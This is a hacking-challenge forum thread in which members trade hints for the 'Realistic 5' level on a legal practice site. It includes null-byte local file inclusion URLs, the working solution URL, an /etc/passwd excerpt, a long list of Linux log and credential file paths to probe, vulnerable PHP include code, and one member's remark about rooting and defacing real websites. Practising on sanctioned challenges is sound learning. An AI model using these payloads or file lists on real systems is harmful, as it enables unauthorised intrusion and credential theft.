ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.

You are not logged in.

#26 2011-02-28 03:01:24

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Realistic 5

you are on the right track phcoder, although pup is javascript, so why not just see where it is taking you to?


Site admin

Offline

#27 2012-03-23 17:32:36

strongard110
Member
Registered: 2012-03-05
Posts: 22

Re: Realistic 5

I need help , I tried null byte poisoning and I got access to the etc/passwd file (root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x....) but I can not find the password as it is shadowed , I searched in all other files like etc/profiles , etc/services , bin/bash but I found nothing what I am missing??? any hint would be appreciated  I am really stuck

Offline

#28 2012-03-24 05:36:39

phcoder
Member
Registered: 2011-02-09
Posts: 32

Re: Realistic 5

look at what the javascript pup(img) does....thats how I figured it out

Offline

#29 2012-03-24 06:39:47

dariusmare
Member
Registered: 2012-03-20
Posts: 40

Re: Realistic 5

I tried MS Acces Blind and i get some Tables and Rows but still i can't get the password :|


If i helped you please press the Thanks Button under my Profile Actually press (look left)

Offline

#30 2012-03-25 01:26:39

phcoder
Member
Registered: 2011-02-09
Posts: 32

Re: Realistic 5

[spoiler] the password is inside a file, you just need to make the website open that file using null byte [/spoiler]

I don't think I can say more than that w/o spoiling it completely....one more thing [spoiler]just look at the source code and try to find "pup(img)" [/spoiler]

Offline

#31 2012-03-25 03:54:36

dariusmare
Member
Registered: 2012-03-20
Posts: 40

Re: Realistic 5

I tried anything like this:
http://www.thisislegal.com/nc/details.php?p=../../adm/login.pwd%00
http://www.thisislegal.com/nc/details.php?p=adm/login.pwd%00
http://www.thisislegal.com/nc/details.php?p=adm/login%00.pwd
etc.

but it still doesn't works :|


If i helped you please press the Thanks Button under my Profile Actually press (look left)

Offline

#32 2012-03-25 15:00:21

strongard110
Member
Registered: 2012-03-05
Posts: 22

Re: Realistic 5

"the password is inside a file, you just need to make the website open that file using null byte "

I know that the password is inside a file but how I get this file I am really stuck

just look at the source code and try to find "pup(img)"

I have already did it before you post your message to help me

href="javascript:pup('images/server')

and here is the script


function pup(img) {

var URL = "i.php?img=";
var URL2 = URL + img;


day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL2,  '" + id + "', '

all what is function do is to pop up the box in which there is the image of the server , this technique in javascript is used for publicity to make the photo seems big in each full version . sorry I did not get how this pup(img) will help me find the password

besides I tried a lot of directories with null byte

I tried all these

login.pwd



/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/wtmp
/etc/utmp
...
/opt/lampp/logs/error_log
/opt/lampp/logs/access_log
...
/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/var/log/wtmp
/var/run/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/acct
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/access.log
/var/log/auth.log
/var/log/xferlog
/var/log/message
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth
/var/log/kern.log
/var/log/cron.log
/var/log/maillog
/var/log/qmail/
/var/log/httpd/
/var/log/lighttpd
/var/log/boot.log
/var/log/mysqld.log
/var/log/secure
/var/log/utmp
/var/log/wtmp
/var/log/yum.log
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/logs/access_log
...
/root/.ksh_history
/root/.bash_history
/root/.bash_logut

...
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/error.log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log


the file in which there is the password is login.pwd but it give only error open the file when I try null byte or I get a blank page

ANOTHER MORE IMPORTANT THING THAT I HOPE YOU PHPCODER TO EXPLAIN TO ME

there is no password in etc/passwd and it gives no information that help me find the password so why it is used in this challenge if it useless , in a REAL hacking of a website server in Google , if am able to get the etc/passwd this means that I can uses what we call SERVER ROOTING techniqueto become a root and deface the website
but when www.thisislegal.com is sanatized against this technique

I am a noob , a beginner and my experience of haking is only 4 months I need help in this challenge

Offline

#33 2012-03-25 16:37:28

phcoder
Member
Registered: 2011-02-09
Posts: 32

Re: Realistic 5

@dariusmare, you have got the right file, but you are injecting the wrong php....
[spoiler] details.php wont open it for u [/spoiler]

@strongard110, please do not shout at me! I'm not the admin for the site nor am I the author of this challenge or any other for that matter.

Offline

#34 2012-03-25 19:44:06

gixxygamma
Member
Registered: 2012-03-25
Posts: 2

Re: Realistic 5

Well I got into the login.pwd file, now I think I need to decrypt? John the Ripper isn't helping though....

Offline

#35 2012-03-29 13:14:16

strongard110
Member
Registered: 2012-03-05
Posts: 22

Re: Realistic 5

I tried

http://www.thisislegal.com/nc/i.php?img=login.pwd%00
http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00
there is only two .php file (details and i) in the site ,  no other php file except these two is found and I tried to do the null byte to see the content login.pwd as it is the right file that contains the password 

I do this  i.php as following

http://www.thisislegal.com/nc/i.php?img=login.pwd%00
http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00

but it gives me nothing only error opening file , it gives me  error opening file because I do not have administrator privilege to open the file as I do not have privilege to open etc/shadow ... the only file I can access is etc/passwd
I tried different options as I put in my last message but I got nothing
I call  the person who makes  this challenge for people to solve and i call  tommy9 the administrator to give me a hint about how I can solve this challenge
I searched in every inch of the site I tried with http header , tamper data , but nothing works , I red the forum many times , I red the tutorial and articles many time , I tried LFI , I tried RFI , directory traversal , NULL BYTE INJECTION , I tried To inject the source code like that

<?PHP
if($_GET['page']=='home') include 'home.php';
else include('pages/'.$_GET['page']); // here is the vulnerability
?>

<?PHP
if($_GET['page']=='home') include 'home.php';
else include($_GET['page'].'.php'); // here is the vulnerability
?>
how the hell should I solve this challenge???
any help will be appreciated

Offline

#36 2012-03-31 06:13:53

orion
Member
Registered: 2012-03-19
Posts: 57

Re: Realistic 5

hey i found the login page but i cheated. i saw it in someones post. other than that idk what to do at all


wHeNInDOubTrOllOUt!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!biggrin

Offline

#37 2012-03-31 10:17:20

strongard110
Member
Registered: 2012-03-05
Posts: 22

Re: Realistic 5

I tried

http://www.thisislegal.com/nc/i.php?img=login.pwd%00
http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00
there is only two .php file (details and i) in the site , no other php file except these two is found and I tried to do the null byte to see the content login.pwd as it is the right file that contains the password

I do this i.php as following

http://www.thisislegal.com/nc/i.php?img=login.pwd%00
http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00

but it gives me nothing only error opening file , it gives me error opening file because I do not have administrator privilege to open the file as I do not have privilege to open etc/shadow ... the only file I can access is etc/passwd
I tried different options as I put in my last message but I got nothing
I call the person who makes this challenge for people to solve and i call tommy9 the administrator to give me a hint about how I can solve this challenge
I searched in every inch of the site I tried with http header , tamper data , but nothing works , I red the forum many times , I red the tutorial and articles many time , I tried LFI , I tried RFI , directory traversal , NULL BYTE INJECTION , I tried To inject the source code like that

<?PHP
if($_GET['page']=='home') include 'home.php';
else include('pages/'.$_GET['page']); // here is the vulnerability
?>

<?PHP
if($_GET['page']=='home') include 'home.php';
else include($_GET['page'].'.php'); // here is the vulnerability
?>
how the hell should I solve this challenge???
any help will be appreciated

Offline

#38 2012-04-02 16:31:11

phcoder
Member
Registered: 2011-02-09
Posts: 32

Re: Realistic 5

[spoiler]"http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00" works for me, I can't understand why it doesn't work for you...[/spoiler]

Offline

#39 2012-04-04 11:25:30

strongard110
Member
Registered: 2012-03-05
Posts: 22

Re: Realistic 5

phcoder , I want to say sorry , if I shouted at you , I do not mean to be rude excuse my impoliteness , I was only very nervous , and my nervosity is justified today , I had reason to be nervous as the link in the challenge site was broken
and what jutifies my words is the following

few weeks ago when I put http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00 , a green page came up in which was written " error opening file " now the same link gives me the password , I lost 1 month in this very easy challenge not because of a misconcentration , not because of a technical weakness , not because of the absence of emotional content but  because there was the challenge was broken , it made me suffered a lot anyway thank you very much phcoder ,

another thing , you hint gives the solution DELETE IT PLEASE AND DELETE MY MESSAGE , I call the adminstrators , please to delete the hint of phcoder and my post they give a lot

Offline

#40 2012-06-22 10:21:26

pinkyPink
Member
Registered: 2012-06-22
Posts: 2

Re: Realistic 5

witch decryptor

Offline

#41 2012-06-22 10:26:49

pinkyPink
Member
Registered: 2012-06-22
Posts: 2

Re: Realistic 5

sorry. i'm lytle drunk. Found it

Offline

#42 2012-06-22 10:33:14

pogo
Member
Registered: 2012-03-27
Posts: 46

Re: Realistic 5

pinkyPink: it is just encoded, not encrypted. The biggest hint would be the equal signs towards the right.

Offline

#43 2012-07-06 12:57:58

Mavvo
Member
Registered: 2012-07-06
Posts: 1

Re: Realistic 5

@strongard110 well actually your nervosity is not jusified by what u suppose was a broken challenge.
Actually the errore message was still your fault.. :
If u tryed something different just before the right try then what u get is the previous link with the %00 plus your right answer with the %00 at the end, let me explain with an example(sorry for my super bad enslish):
1st try : -http://www.thisislegal.com/nc/i.php?img=adm/login%00.pwd
-press enter
-after page is loaded u have in the address bar : http://www.thisislegal.com/nc/i.php?img=adm/login.pwd  THAT'S NO CORRECT, if u look carefully u can see in the title bar that is still have : http://www.thisislegal.com/nc/i.php?img=adm/login%00.pwd
-so if u now try http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00 (supposed to be thee right answer) u instead are getting: http://www.thisislegal.com/nc/i.php?img=adm/login%00.pwd%00 that is : http://www.thisislegal.com/nc/i.php?img=adm/login! not correct.
-if u now try http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00
tada correct!

Offline

#44 2013-05-27 10:30:42

Backbite
Member
Registered: 2013-04-26
Posts: 66

Re: Realistic 5

witch decryptor

see "=="

It is
[spoiler] *a*e64[/spoiler]

Offline

#45 2014-07-22 02:49:25

Abhi_hacker
Member
Registered: 2014-07-22
Posts: 1

Re: Realistic 5

Hey guys , can someone help me here ? I can't find the page where I have to enter the login details !! Thanks in advance smile

Offline

#46 2017-03-28 12:22:45

sheldon21grd
Member
Registered: 2017-03-28
Posts: 1

Re: Realistic 5

url based hacking

Offline

#47 2017-03-30 05:23:51

DillonShaw
Member
Registered: 2017-03-30
Posts: 6

Re: Realistic 5

hi

Offline

#48 2017-03-30 05:23:51

DillonShaw
Member
Registered: 2017-03-30
Posts: 6

Re: Realistic 5

hi

Offline

#49 2017-03-30 05:23:52

DillonShaw
Member
Registered: 2017-03-30
Posts: 6

Re: Realistic 5

hi

Offline

#50 2017-03-30 05:23:53

DillonShaw
Member
Registered: 2017-03-30
Posts: 6

Re: Realistic 5

hi

Offline

Board footer

Powered by FluxBB